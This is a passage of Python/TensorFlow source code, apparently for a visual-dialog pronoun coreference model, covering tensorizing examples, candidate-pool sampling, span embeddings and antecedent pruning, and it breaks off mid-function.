objs = [self.lm_obj_file[str(obj)]['0'][...] for obj in objs]
lm_emb_objs = np.zeros([len(objs), max(c.shape[0] for c in objs), self.lm_size, self.lm_layers])
for i, c in enumerate(objs):
lm_emb_objs[i, :c.shape[0], :, :] = c
return lm_emb_objs
def load_im_feat(self, doc_key):
if self.im_fc_file is None:
return np.zeros(self.im_fc_feat_size)
file_key = doc_key.replace("/", ":")
im_feat = self.im_fc_file[file_key][:]
return im_feat
def tensorize_mentions(self, mentions):
if len(mentions) > 0:
starts, ends = zip(*mentions)
else:
starts, ends = [], []
return np.array(starts), np.array(ends)
  def tensorize_example(self, example, is_training):
    """Convert one JSON example into the flat tensor list consumed by the
    input queue (same order as `input_props` in __init__).

    Args:
      example: dict with "clusters", "sentences", "speakers", "doc_key",
        "correct_caption_NPs", "pronoun_info" and, when use_im,
        "object_detection". NOTE(review): example["speakers"] and
        example["object_detection"] are mutated in place below.
      is_training: Python bool; controls candidate-pool sampling seeds.
    """
    clusters = example["clusters"]
    # Map each gold mention (start, end) to its 1-based cluster id.
    gold_mentions = sorted(tuple(m) for m in util.flatten(clusters))
    gold_mention_map = {m:i for i,m in enumerate(gold_mentions)}
    cluster_ids = np.zeros(len(gold_mentions))
    for cluster_id, cluster in enumerate(clusters):
      for mention in cluster:
        cluster_ids[gold_mention_map[tuple(mention)]] = cluster_id + 1
    sentences = example["sentences"]
    # Pad per-sentence token/char tensors to the longest sentence/word.
    max_sentence_length = max(len(s) for s in sentences)
    max_word_length = max(max(max(len(w) for w in s) for s in sentences), max(self.config["filter_widths"]))
    text_len = np.array([len(s) for s in sentences])
    tokens = [[""] * max_sentence_length for _ in sentences]
    context_word_emb = np.zeros([len(sentences), max_sentence_length, self.context_embeddings.size])
    head_word_emb = np.zeros([len(sentences), max_sentence_length, self.head_embeddings.size])
    char_index = np.zeros([len(sentences), max_sentence_length, max_word_length])
    for i, sentence in enumerate(sentences):
      for j, word in enumerate(sentence):
        if i == 0:
          # First sentence is the caption: lowercase it.
          word = word.lower()
        tokens[i][j] = word
        context_word_emb[i, j] = self.context_embeddings[word]
        head_word_emb[i, j] = self.head_embeddings[word]
        char_index[i, j, :len(word)] = [self.char_dict[c] for c in word]
    tokens = np.array(tokens)
    if self.num_cdd_pool > 0:
      # random pick samples to a candidate pool of fixed number
      num_cdd_pick = self.num_cdd_pool - len(example["correct_caption_NPs"])
      num_cdd_pick = max(1, num_cdd_pick)
      cdd_examples = []
      all_sentences = list()
      for sent in sentences:
        all_sentences += sent
      # Text of this example's own candidate NPs, used to reject
      # duplicate negatives sampled from the pool.
      candidate_cur = example["pronoun_info"][-1]["candidate_NPs"]
      candidate_cur = [' '.join(all_sentences[c[0]:c[1]+1]) for c in candidate_cur]
      if not is_training:
        sample_times = 0
      while len(cdd_examples) < num_cdd_pick:
        if not is_training:
          # Eval: deterministic sampling keyed on the doc and attempt.
          random.seed(example["doc_key"] + str(sample_times))
          cdd_cur = random.choice(self.cdd_nps)
          sample_times += 1
        else:
          cdd_cur = random.choice(self.cdd_nps)
        # samples in candidate pools should not be the same as candidate nps
        cdd_text = ' '.join(cdd_cur["sentences"][0]).lower()
        repeat_flag = False
        for cdd in candidate_cur:
          if cdd.lower() == cdd_text:
            repeat_flag = True
            break
        if not repeat_flag:
          cdd_examples.append(cdd_cur)
      # Tensorize the sampled pool NPs exactly like real sentences.
      sentences_cdd = [s["sentences"][0] for s in cdd_examples]
      max_sentence_length_cdd = max(len(s) for s in sentences_cdd)
      max_word_length_cdd = max(max(max(len(w) for w in s) for s in sentences_cdd), max(self.config["filter_widths"]))
      text_len_cdd = np.array([len(s) for s in sentences_cdd])
      context_word_emb_cdd = np.zeros([len(sentences_cdd), max_sentence_length_cdd, self.context_embeddings.size])
      head_word_emb_cdd= np.zeros([len(sentences_cdd), max_sentence_length_cdd, self.head_embeddings.size])
      char_index_cdd = np.zeros([len(sentences_cdd), max_sentence_length_cdd, max_word_length_cdd])
      tokens_cdd = [[""] * max_sentence_length_cdd for _ in sentences_cdd]
      for i, sentence_cdd in enumerate(sentences_cdd):
        for j, word_cdd in enumerate(sentence_cdd):
          tokens_cdd[i][j] = word_cdd
          context_word_emb_cdd[i, j] = self.context_embeddings[word_cdd]
          head_word_emb_cdd[i, j] = self.head_embeddings[word_cdd]
          char_index_cdd[i, j, :len(word_cdd)] = [self.char_dict[c] for c in word_cdd]
      tokens_cdd = np.array(tokens_cdd)
      lm_emb_cdd = self.load_lm_embeddings_cdd(cdd_examples)
      # Pool NPs are all attributed to the 'caption' speaker.
      for len_cdd in text_len_cdd:
        example["speakers"].append(['caption',] * len_cdd)
    doc_key = example["doc_key"]
    if self.use_im_fc:
      im_feat = self.load_im_feat(doc_key)
    if self.use_im:
      # Detected-object label sentences; id 0 is appended as a sentinel
      # so the list is never empty.
      detections = example["object_detection"]
      has_obj = len(detections) > 0
      detections.append(0)
      sentences_obj = [self.id2cat[i] for i in detections]
      max_sentence_length_obj = max(len(s) for s in sentences_obj)
      max_word_length_obj = max(max(max(len(w) for w in s) for s in sentences_obj), max(self.config["filter_widths"]))
      text_len_obj = np.array([len(s) for s in sentences_obj])
      context_word_emb_obj = np.zeros([len(sentences_obj), max_sentence_length_obj, self.context_embeddings.size])
      head_word_emb_obj= np.zeros([len(sentences_obj), max_sentence_length_obj, self.head_embeddings.size])
      char_index_obj = np.zeros([len(sentences_obj), max_sentence_length_obj, max_word_length_obj])
      tokens_obj = [[""] * max_sentence_length_obj for _ in sentences_obj]
      for i, sentence_obj in enumerate(sentences_obj):
        for j, word_obj in enumerate(sentence_obj):
          tokens_obj[i][j] = word_obj
          context_word_emb_obj[i, j] = self.context_embeddings[word_obj]
          head_word_emb_obj[i, j] = self.head_embeddings[word_obj]
          char_index_obj[i, j, :len(word_obj)] = [self.char_dict[c] for c in word_obj]
      lm_emb_obj = self.load_lm_embeddings_obj(example["object_detection"])
    speakers = util.flatten(example["speakers"])
    speaker_dict = { s:i for i,s in enumerate(set(speakers)) }
    speaker_ids = np.array([speaker_dict[s] for s in speakers])
    caption_candidates = example["correct_caption_NPs"]
    if len(caption_candidates) == 0:
      # add 1 NP to avoid empty candidates
      caption_candidates = [[0, 0]]
    candidate_starts_caption, candidate_ends_caption = self.tensorize_mentions(caption_candidates)
    gold_starts, gold_ends = self.tensorize_mentions(gold_mentions)
    lm_emb_cap, lm_emb_dial = self.load_lm_embeddings(doc_key)
    # Assemble the queue feed list; order must match input_props.
    example_tensors = [tokens, context_word_emb, head_word_emb, lm_emb_cap, lm_emb_dial, char_index, text_len, speaker_ids, is_training, gold_starts, gold_ends, cluster_ids, candidate_starts_caption, candidate_ends_caption]
    example_tensors.extend([text_len_cdd, context_word_emb_cdd, head_word_emb_cdd, char_index_cdd, lm_emb_cdd, tokens_cdd])
    if self.use_im:
      example_tensors.extend([text_len_obj, context_word_emb_obj, head_word_emb_obj, char_index_obj, lm_emb_obj, tokens_obj, has_obj])
    else:
      # Zero-shaped placeholders keep the queue spec satisfied.
      example_tensors.extend([[0], np.zeros([0, 0, self.context_embeddings.size]),
                  np.zeros([0, 0, self.head_embeddings.size]),
                  np.zeros([0, 0, 1]), np.zeros([0, 0, self.lm_size, self.lm_layers]),
                  np.zeros([0, 1]), False])
    if self.use_im_fc:
      example_tensors.append(im_feat)
    else:
      example_tensors.append(np.zeros(self.config["im_fc_feat_size"]))
    return example_tensors
def get_candidate_labels(self, candidate_starts, candidate_ends, labeled_starts, labeled_ends, labels):
same_start = tf.equal(tf.expand_dims(labeled_starts, 1), tf.expand_dims(candidate_starts, 0)) # [num_labeled, num_candidates]
same_end = tf.equal(tf.expand_dims(labeled_ends, 1), tf.expand_dims(candidate_ends, 0)) # [num_labeled, num_candidates]
same_span = tf.logical_and(same_start, same_end) # [num_labeled, num_candidates]
candidate_labels = tf.matmul(tf.expand_dims(labels, 0), tf.to_int32(same_span)) # [1, num_candidates]
candidate_labels = tf.squeeze(candidate_labels, 0) # [num_candidates]
return candidate_labels
def get_dropout(self, dropout_rate, is_training):
return 1 - (tf.to_float(is_training) * dropout_rate)
  def coarse_to_fine_pruning(self, top_span_emb, top_span_mention_scores, c, top_span_cdd_pool_flag=None):
    """Coarse stage: keep the `c` highest fast-scoring antecedents per span.

    Candidate-pool spans (flagged by top_span_cdd_pool_flag) are assigned
    position 0 while dialog spans get positions 1..n, so every dialog span
    may attend to any pool span, and dialog spans only attend to strictly
    earlier dialog spans (offset >= 1).
    Returns (top_antecedents, mask, fast_scores, offsets), each [k, c].
    """
    k = util.shape(top_span_emb, 0)
    top_span_range = tf.range(k) # [k]
    # How many of the k spans come from the external candidate pool.
    num_cdd_in_pool = tf.reduce_sum(tf.cast(top_span_cdd_pool_flag, tf.int32))
    num_cdd_in_dial = k - num_cdd_in_pool
    # Pool spans share position 0; dialog spans are numbered 1..n.
    top_span_range_cdd = tf.concat([tf.zeros(num_cdd_in_pool, tf.int32), tf.range(1, num_cdd_in_dial + 1)], 0)
    antecedent_offsets = tf.expand_dims(top_span_range_cdd, 1) - tf.expand_dims(top_span_range_cdd, 0) # [k, k]
    antecedents_mask = antecedent_offsets >= 1 # [k, k]
    # Cheap pairwise score: sum of unary mention scores, -inf where masked.
    fast_antecedent_scores = tf.expand_dims(top_span_mention_scores, 1) + tf.expand_dims(top_span_mention_scores, 0) # [k, k]
    fast_antecedent_scores += tf.log(tf.to_float(antecedents_mask)) # [k, k]
    fast_antecedent_scores += self.get_fast_antecedent_scores(top_span_emb) # [k, k]
    _, top_antecedents = tf.nn.top_k(fast_antecedent_scores, c, sorted=False) # [k, c]
    top_antecedents_mask = util.batch_gather(antecedents_mask, top_antecedents) # [k, c]
    top_fast_antecedent_scores = util.batch_gather(fast_antecedent_scores, top_antecedents) # [k, c]
    top_antecedent_offsets = util.batch_gather(antecedent_offsets, top_antecedents) # [k, c]
    return top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets
  def distance_pruning(self, top_span_emb, top_span_mention_scores, c):
    """Fixed-window pruning: each span considers only the `c` immediately
    preceding spans as antecedents.
    Returns (top_antecedents, mask, fast_scores, offsets), each [k, c].
    """
    k = util.shape(top_span_emb, 0)
    # Offsets 1..c, replicated for every span.
    top_antecedent_offsets = tf.tile(tf.expand_dims(tf.range(c) + 1, 0), [k, 1]) # [k, c]
    raw_top_antecedents = tf.expand_dims(tf.range(k), 1) - top_antecedent_offsets # [k, c]
    # Indices that fall off the left edge are masked and clamped to 0.
    top_antecedents_mask = raw_top_antecedents >= 0 # [k, c]
    top_antecedents = tf.maximum(raw_top_antecedents, 0) # [k, c]
    top_fast_antecedent_scores = tf.expand_dims(top_span_mention_scores, 1) + tf.gather(top_span_mention_scores, top_antecedents) # [k, c]
    # -inf for masked slots so they never win downstream softmaxes.
    top_fast_antecedent_scores += tf.log(tf.to_float(top_antecedents_mask)) # [k, c]
    return top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets
def get_predictions_and_loss(self, tokens, context_word_emb, head_word_emb, lm_emb_cap, lm_emb_dial, char_index, text_len, speaker_ids, is_training, gold_starts, gold_ends, cluster_ids, candidate_starts_caption, candidate_ends_caption, text_len_cdd, context_word_emb_cdd, head_word_emb_cdd, char_index_cdd, lm_emb_cdd, tokens_cdd, text_len_obj, context_word_emb_obj, head_word_emb_obj, char_index_obj, lm_emb_obj, tokens_obj, has_obj, im_feat):
    """Build the whole model graph and return (outputs, loss).

    Pipeline: word+char embeddings for the main text, the external candidate
    pool (`*_cdd`) and, when self.use_im, image-object phrases (`*_obj`);
    layer-weighted LM embeddings; BiLSTM contextualization; span embeddings
    for dialog spans, caption NPs, pool phrases and objects; top-span pruning
    via coref_ops.extract_spans; iterative antecedent scoring; marginal
    log-likelihood loss over gold antecedents.

    NOTE(review): sentence 0 is treated as the caption and sentences 1: as the
    dialog throughout (see the text_len[0] / [1:] slices) — confirm with callers.
    """
    self.dropout = self.get_dropout(self.config["dropout_rate"], is_training)
    self.lexical_dropout = self.get_dropout(self.config["lexical_dropout_rate"], is_training)
    self.lstm_dropout = self.get_dropout(self.config["lstm_dropout_rate"], is_training)
    if self.use_im_fc:
        self.im_dropout = self.get_dropout(self.config["im_dropout_rate"], is_training)
    # for all sentences including caption
    num_sentences = tf.shape(context_word_emb)[0]
    max_sentence_length = tf.shape(context_word_emb)[1]
    context_emb_list = [context_word_emb]
    head_emb_list = [head_word_emb]
    # get char embedding by conv1d on char embeddings of each word
    if self.config["char_embedding_size"] > 0:
        char_emb_all = tf.get_variable("char_embeddings", [len(self.char_dict), self.config["char_embedding_size"]])
        char_emb = tf.gather(char_emb_all, char_index) # [num_sentences, max_sentence_length, max_word_length, emb]
        flattened_char_emb = tf.reshape(char_emb, [num_sentences * max_sentence_length, util.shape(char_emb, 2), util.shape(char_emb, 3)]) # [num_sentences * max_sentence_length, max_word_length, emb]
        flattened_aggregated_char_emb = util.cnn(flattened_char_emb, self.config["filter_widths"], self.config["filter_size"]) # [num_sentences * max_sentence_length, emb]
        aggregated_char_emb = tf.reshape(flattened_aggregated_char_emb, [num_sentences, max_sentence_length, util.shape(flattened_aggregated_char_emb, 1)]) # [num_sentences, max_sentence_length, emb]
        context_emb_list.append(aggregated_char_emb)
        head_emb_list.append(aggregated_char_emb)
    # for candidate pool
    num_sentences_cdd = tf.shape(context_word_emb_cdd)[0]
    max_sentence_length_cdd = tf.shape(context_word_emb_cdd)[1]
    context_emb_list_cdd = [context_word_emb_cdd]
    head_emb_list_cdd = [head_word_emb_cdd]
    # get char embedding by conv1d on char embeddings of each word
    # (reuses char_emb_all created above, so char_embedding_size must be > 0
    # for the cdd branch to work)
    if self.config["char_embedding_size"] > 0:
        char_emb_cdd = tf.gather(char_emb_all, char_index_cdd) # [num_sentences, max_sentence_length, max_word_length, emb]
        flattened_char_emb_cdd = tf.reshape(char_emb_cdd, [num_sentences_cdd * max_sentence_length_cdd, util.shape(char_emb_cdd, 2), util.shape(char_emb_cdd, 3)]) # [num_sentences * max_sentence_length, max_word_length, emb]
        flattened_aggregated_char_emb_cdd = util.cnn(flattened_char_emb_cdd, self.config["filter_widths"], self.config["filter_size"]) # [num_sentences * max_sentence_length, emb]
        aggregated_char_emb_cdd = tf.reshape(flattened_aggregated_char_emb_cdd, [num_sentences_cdd, max_sentence_length_cdd, util.shape(flattened_aggregated_char_emb_cdd, 1)]) # [num_sentences, max_sentence_length, emb]
        context_emb_list_cdd.append(aggregated_char_emb_cdd)
        head_emb_list_cdd.append(aggregated_char_emb_cdd)
    context_emb_cdd = tf.concat(context_emb_list_cdd, 2) # [num_sentences, max_sentence_length, emb]
    head_emb_cdd = tf.concat(head_emb_list_cdd, 2) # [num_sentences, max_sentence_length, emb]
    # extract embedding for NPs in caption here
    context_emb = tf.concat(context_emb_list, 2) # [num_sentences, max_sentence_length, emb]
    head_emb = tf.concat(head_emb_list, 2) # [num_sentences, max_sentence_length, emb]
    # each caption NP becomes its own row, padded to the widest NP
    text_len_cap = candidate_ends_caption - candidate_starts_caption + 1
    max_span_width_cap = tf.math.reduce_max(text_len_cap)
    span_indices_cap = tf.expand_dims(tf.range(max_span_width_cap), 0) + tf.expand_dims(candidate_starts_caption, 1) # [num_candidates_cap, max_span_width_cap]
    span_indices_cap = tf.minimum(text_len[0] - 1, span_indices_cap) # [num_candidates_cap, max_span_width_cap]; clamp padding into the caption
    context_emb_cap = tf.gather(context_emb[0], span_indices_cap) # [num_candidates_cap, max_span_width_cap, emb]
    head_emb_cap = tf.gather(head_emb[0], span_indices_cap) # [num_candidates_cap, max_span_width_cap, emb]
    # project lm_num_layer to 1 and scale
    lm_emb_size = util.shape(lm_emb_dial, 2)
    lm_num_layers = util.shape(lm_emb_dial, 3)
    # for sentences in dialog only
    num_sentences_dial = util.shape(lm_emb_dial, 0)
    max_sentence_length_dial = util.shape(lm_emb_dial, 1)
    # for caption
    num_candidates_cap = util.shape(lm_emb_cap, 0)
    max_candidate_length_cap = util.shape(lm_emb_cap, 1)
    # get projection and scaling parameter
    with tf.variable_scope("lm_aggregation"):
        self.lm_weights = tf.nn.softmax(tf.get_variable("lm_scores", [lm_num_layers], initializer=tf.constant_initializer(0.0)))
        self.lm_scaling = tf.get_variable("lm_scaling", [], initializer=tf.constant_initializer(1.0))
    # for lm emb of cap
    flattened_lm_emb_cap = tf.reshape(lm_emb_cap, [num_candidates_cap * max_candidate_length_cap * lm_emb_size, lm_num_layers])
    flattened_aggregated_lm_emb_cap = tf.matmul(flattened_lm_emb_cap, tf.expand_dims(self.lm_weights, 1)) # [num_candidates_cap * max_candidate_length_cap * emb, 1]
    aggregated_lm_emb_cap = tf.reshape(flattened_aggregated_lm_emb_cap, [num_candidates_cap, max_candidate_length_cap, lm_emb_size])
    aggregated_lm_emb_cap *= self.lm_scaling
    # for lm emb of dial
    flattened_lm_emb_dial = tf.reshape(lm_emb_dial, [num_sentences_dial * max_sentence_length_dial * lm_emb_size, lm_num_layers])
    flattened_aggregated_lm_emb_dial = tf.matmul(flattened_lm_emb_dial, tf.expand_dims(self.lm_weights, 1)) # [num_sentences_dial * max_sentence_length_dial * emb, 1]
    aggregated_lm_emb_dial = tf.reshape(flattened_aggregated_lm_emb_dial, [num_sentences_dial, max_sentence_length_dial, lm_emb_size])
    aggregated_lm_emb_dial *= self.lm_scaling
    # for lm emb of cdd
    num_candidates_cdd = util.shape(lm_emb_cdd, 0)
    max_candidate_length_cdd = util.shape(lm_emb_cdd, 1)
    flattened_lm_emb_cdd = tf.reshape(lm_emb_cdd, [num_candidates_cdd * max_candidate_length_cdd * lm_emb_size, lm_num_layers])
    flattened_aggregated_lm_emb_cdd = tf.matmul(flattened_lm_emb_cdd, tf.expand_dims(self.lm_weights, 1)) # [num_candidates_cdd * max_candidate_length_cdd * emb, 1]
    aggregated_lm_emb_cdd = tf.reshape(flattened_aggregated_lm_emb_cdd, [num_candidates_cdd, max_candidate_length_cdd, lm_emb_size])
    aggregated_lm_emb_cdd *= self.lm_scaling
    # dialog = sentences 1: of the main text, trimmed to the dial LM length
    context_emb_dial = tf.concat([context_emb[1:, :max_sentence_length_dial], aggregated_lm_emb_dial], 2) # [num_sentences_dial, max_sentence_length_dial, emb]
    context_emb_cap = tf.concat([context_emb_cap, aggregated_lm_emb_cap], 2) # [num_candidates_cap, max_candidate_length_cap, emb]
    context_emb_dial = tf.nn.dropout(context_emb_dial, self.lexical_dropout) # [num_sentences_dial, max_sentence_length_dial, emb]
    context_emb_cap = tf.nn.dropout(context_emb_cap, self.lexical_dropout) # [num_candidates_cap, max_candidate_length_cap, emb]
    head_emb_cap = tf.nn.dropout(head_emb_cap, self.lexical_dropout) # [num_candidates_cap, max_candidate_length_cap, emb]
    context_emb_cdd = tf.concat([context_emb_cdd, aggregated_lm_emb_cdd], 2) # [num_candidates_cdd, max_candidate_length_cdd, emb]
    context_emb_cdd = tf.nn.dropout(context_emb_cdd, self.lexical_dropout) # [num_candidates_cdd, max_candidate_length_cdd, emb]
    head_emb_cdd = tf.nn.dropout(head_emb_cdd, self.lexical_dropout) # [num_candidates_cdd, max_candidate_length_cdd, emb]
    # len mask for caption and dialog
    text_len_dial = text_len[1:]
    text_len_mask_dial = tf.sequence_mask(text_len_dial, maxlen=max_sentence_length_dial) # [num_sentence_dial, max_sentence_length_dial]
    # extract lstm feature for cap and dial, and flatten to only valid words for dial
    context_outputs_cap = self.lstm_contextualize(context_emb_cap, text_len_cap) # [num_candidates_cap, max_candidate_length_cap, emb]
    context_outputs_dial = self.lstm_contextualize(context_emb_dial, text_len_dial, text_len_mask_dial) # [num_words_dial, emb]
    num_words_dial = util.shape(context_outputs_dial, 0)
    num_words = tf.reduce_sum(text_len)
    # caption word positions are zero-padded so dialog word indices stay global
    context_outputs = tf.concat([tf.zeros([num_words - num_words_dial, util.shape(context_outputs_dial, 1)]), context_outputs_dial], 0) # [num_words, emb]
    context_outputs_cdd = self.lstm_contextualize(context_emb_cdd, text_len_cdd) # [num_candidates_cdd, max_candidate_length_cdd, emb]
    # flatten head embedding of only valid words
    sentence_indices = tf.tile(tf.expand_dims(tf.range(num_sentences), 1), [1, max_sentence_length]) # [num_sentences, max_sentence_length]
    text_len_mask = tf.sequence_mask(text_len, maxlen=max_sentence_length) # [num_sentence, max_sentence_length]
    flattened_sentence_indices = self.flatten_emb_by_sentence(sentence_indices, text_len_mask) # [num_words]
    flattened_head_emb = self.flatten_emb_by_sentence(head_emb, text_len_mask) # [num_words]
    # enumerate all spans up to max_span_width that stay within one sentence
    candidate_starts = tf.tile(tf.expand_dims(tf.range(num_words), 1), [1, self.max_span_width]) # [num_words, max_span_width]
    candidate_ends = candidate_starts + tf.expand_dims(tf.range(self.max_span_width), 0) # [num_words, max_span_width]
    candidate_start_sentence_indices = tf.gather(flattened_sentence_indices, candidate_starts) # [num_words, max_span_width]
    candidate_end_sentence_indices = tf.gather(flattened_sentence_indices, tf.minimum(candidate_ends, num_words - 1)) # [num_words, max_span_width]
    candidate_mask = tf.logical_and(candidate_ends < num_words, tf.equal(candidate_start_sentence_indices, candidate_end_sentence_indices)) # [num_words, max_span_width]
    # keep candidates in dialog, exclude those in caption
    candidate_mask_dial = tf.logical_and(candidate_mask, candidate_starts >= text_len[0]) # [num_words, max_span_width]
    flattened_candidate_mask_dial = tf.reshape(candidate_mask_dial, [-1]) # [num_words * max_span_width]
    candidate_starts_dial = tf.boolean_mask(tf.reshape(candidate_starts, [-1]), flattened_candidate_mask_dial) # [num_candidates_dial]
    candidate_ends_dial = tf.boolean_mask(tf.reshape(candidate_ends, [-1]), flattened_candidate_mask_dial) # [num_candidates_dial]
    candidate_span_emb_dial = self.get_span_emb_dial(flattened_head_emb, context_outputs, candidate_starts_dial, candidate_ends_dial) # [num_candidates, emb]
    # get span emb of candidates in caption
    candidate_span_emb_cap = self.get_span_emb_phrases(head_emb_cap, context_outputs_cap, candidate_starts_caption, candidate_ends_caption) # [num_candidates, emb]
    # cdd phrases get synthetic word offsets placed after the real document
    candidate_ends_cdd = tf.cumsum(text_len_cdd) + num_words - 1
    candidate_starts_cdd = candidate_ends_cdd - text_len_cdd + 1
    candidate_span_emb_cdd = self.get_span_emb_phrases(head_emb_cdd, context_outputs_cdd, candidate_starts_cdd, candidate_ends_cdd) # [num_candidates, emb]
    if self.use_im:
        # same embedding pipeline for image-object phrases
        num_sentences_obj = tf.shape(context_word_emb_obj)[0]
        max_sentence_length_obj = tf.shape(context_word_emb_obj)[1]
        context_emb_list_obj = [context_word_emb_obj]
        head_emb_list_obj = [head_word_emb_obj]
        # get char embedding by conv1d on char embeddings of each word
        if self.config["char_embedding_size"] > 0:
            char_emb_obj = tf.gather(char_emb_all, char_index_obj) # [num_sentences, max_sentence_length, max_word_length, emb]
            flattened_char_emb_obj = tf.reshape(char_emb_obj, [num_sentences_obj * max_sentence_length_obj, util.shape(char_emb_obj, 2), util.shape(char_emb_obj, 3)]) # [num_sentences * max_sentence_length, max_word_length, emb]
            flattened_aggregated_char_emb_obj = util.cnn(flattened_char_emb_obj, self.config["filter_widths"], self.config["filter_size"]) # [num_sentences * max_sentence_length, emb]
            aggregated_char_emb_obj = tf.reshape(flattened_aggregated_char_emb_obj, [num_sentences_obj, max_sentence_length_obj, util.shape(flattened_aggregated_char_emb_obj, 1)]) # [num_sentences, max_sentence_length, emb]
            context_emb_list_obj.append(aggregated_char_emb_obj)
            head_emb_list_obj.append(aggregated_char_emb_obj)
        context_emb_obj = tf.concat(context_emb_list_obj, 2) # [num_sentences, max_sentence_length, emb]
        head_emb_obj = tf.concat(head_emb_list_obj, 2) # [num_sentences, max_sentence_length, emb]
        num_candidates_obj = util.shape(lm_emb_obj, 0)
        max_candidate_length_obj = util.shape(lm_emb_obj, 1)
        flattened_lm_emb_obj = tf.reshape(lm_emb_obj, [num_candidates_obj * max_candidate_length_obj * lm_emb_size, lm_num_layers])
        flattened_aggregated_lm_emb_obj = tf.matmul(flattened_lm_emb_obj, tf.expand_dims(self.lm_weights, 1)) # [num_candidates_obj * max_candidate_length_obj * emb, 1]
        aggregated_lm_emb_obj = tf.reshape(flattened_aggregated_lm_emb_obj, [num_candidates_obj, max_candidate_length_obj, lm_emb_size])
        aggregated_lm_emb_obj *= self.lm_scaling
        context_emb_obj = tf.concat([context_emb_obj, aggregated_lm_emb_obj], 2) # [num_candidates_obj, max_candidate_length_obj, emb]
        context_emb_obj = tf.nn.dropout(context_emb_obj, self.lexical_dropout) # [num_candidates_obj, max_candidate_length_obj, emb]
        head_emb_obj = tf.nn.dropout(head_emb_obj, self.lexical_dropout) # [num_candidates_obj, max_candidate_length_obj, emb]
        context_outputs_obj = self.lstm_contextualize(context_emb_obj, text_len_obj) # [num_candidates_obj, max_candidate_length_obj, emb]
        candidate_ends_obj = tf.cumsum(text_len_obj) - 1
        candidate_starts_obj = candidate_ends_obj - text_len_obj + 1
        obj_span_emb = self.get_span_emb_phrases(head_emb_obj, context_outputs_obj, candidate_starts_obj, candidate_ends_obj) # [num_candidates, emb]
    # concat candidates in caption here
    # candidate order everywhere below: [cdd pool, caption, dialog]
    candidate_starts = tf.concat([candidate_starts_cdd, candidate_starts_caption, candidate_starts_dial], 0)
    candidate_ends = tf.concat([candidate_ends_cdd, candidate_ends_caption, candidate_ends_dial], 0)
    candidate_span_emb = tf.concat([candidate_span_emb_cdd, candidate_span_emb_cap, candidate_span_emb_dial], 0) # [num_candidates, emb]
    candidate_cluster_ids_cap = self.get_candidate_labels(candidate_starts_caption, candidate_ends_caption, gold_starts, gold_ends, cluster_ids)
    candidate_cluster_ids_dial = self.get_candidate_labels(candidate_starts_dial, candidate_ends_dial, gold_starts, gold_ends, cluster_ids)
    # pool candidates never carry gold labels (cluster id 0)
    candidate_cluster_ids = tf.concat([tf.zeros([util.shape(candidate_starts_cdd, 0)], tf.int32), candidate_cluster_ids_cap, candidate_cluster_ids_dial], 0) # [num_candidates]
    candidate_pool_flag = tf.cast(tf.concat([tf.ones(util.shape(candidate_starts_cdd, 0) + util.shape(candidate_starts_caption, 0), tf.int32), tf.zeros(util.shape(candidate_starts_dial, 0), tf.int32)], 0), tf.bool)
    candidate_mention_scores = self.get_mention_scores(candidate_span_emb) # [k, 1]
    candidate_mention_scores = tf.squeeze(candidate_mention_scores, 1) # [k]
    k = tf.minimum(tf.to_int32(tf.floor(tf.to_float(util.shape(candidate_starts, 0)) * self.config["top_span_ratio"])), tf.shape(candidate_mention_scores)[0])
    top_span_indices = coref_ops.extract_spans(tf.expand_dims(candidate_mention_scores, 0),
                                               tf.expand_dims(candidate_starts, 0),
                                               tf.expand_dims(candidate_ends, 0),
                                               tf.expand_dims(k, 0),
                                               util.shape(candidate_mention_scores, 0),
                                               True) # [1, k]
    top_span_indices.set_shape([1, None])
    top_span_indices = tf.squeeze(top_span_indices, 0) # [k]
    # coref_ops add extra 0 to top_span_indices, have to remove it here
    first_index = tf.gather(top_span_indices, tf.constant([0]))
    valid_indices = tf.boolean_mask(top_span_indices, tf.logical_not(tf.equal(top_span_indices, first_index)))
    top_span_indices = tf.concat([first_index, valid_indices], 0)
    k = util.shape(top_span_indices, 0)
    # rearrange top_span to put cdd and cap first
    top_span_cdd_pool_flag = tf.gather(candidate_pool_flag, top_span_indices) # [k]
    top_span_indices_cdd_cap = tf.boolean_mask(top_span_indices, top_span_cdd_pool_flag)
    top_span_indices_dial = tf.boolean_mask(top_span_indices, tf.logical_not(top_span_cdd_pool_flag))
    top_span_indices = tf.concat([top_span_indices_cdd_cap, top_span_indices_dial], 0)
    top_span_starts = tf.gather(candidate_starts, top_span_indices) # [k]
    top_span_ends = tf.gather(candidate_ends, top_span_indices) # [k]
    top_span_emb = tf.gather(candidate_span_emb, top_span_indices) # [k, emb]
    top_span_cluster_ids = tf.gather(candidate_cluster_ids, top_span_indices) # [k]
    top_span_mention_scores = tf.gather(candidate_mention_scores, top_span_indices) # [k]
    top_span_speaker_ids = tf.gather(speaker_ids, top_span_starts) # [k]
    top_span_cdd_pool_flag = tf.gather(candidate_pool_flag, top_span_indices) # [k]
    c = tf.minimum(self.config["max_top_antecedents"], k)
    top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets = self.coarse_to_fine_pruning(top_span_emb, top_span_mention_scores, c, top_span_cdd_pool_flag)
    dummy_scores = tf.zeros([k, 1]) # [k, 1]; score of the "no antecedent" option
    # iterative span refinement: re-score antecedents coref_depth times,
    # updating top_span_emb with a gated attention over antecedents
    for i in range(self.config["coref_depth"]):
        if self.use_im:
            att_grid = self.get_span_im_emb(top_span_emb, obj_span_emb) # [k, emb], [k, emb]
        with tf.variable_scope("coref_layer", reuse=(i > 0)):
            top_antecedent_emb = tf.gather(top_span_emb, top_antecedents) # [k, c, emb]
            if self.use_im:
                top_antecedent_scores_text, top_antecedent_scores_im = self.get_slow_antecedent_scores(top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets, top_span_speaker_ids, im_feat, att_grid, has_obj) # [k, c]
                top_antecedent_scores = top_fast_antecedent_scores + (1 - self.vis_weight) * top_antecedent_scores_text + self.vis_weight * top_antecedent_scores_im
            else:
                top_antecedent_scores = top_fast_antecedent_scores + self.get_slow_antecedent_scores(top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets, top_span_speaker_ids, im_feat) # [k, c]
            top_antecedent_weights = tf.nn.softmax(tf.concat([dummy_scores, top_antecedent_scores], 1)) # [k, c + 1]
            top_antecedent_emb = tf.concat([tf.expand_dims(top_span_emb, 1), top_antecedent_emb], 1) # [k, c + 1, emb]
            attended_span_emb = tf.reduce_sum(tf.expand_dims(top_antecedent_weights, 2) * top_antecedent_emb, 1) # [k, emb]
            with tf.variable_scope("f"):
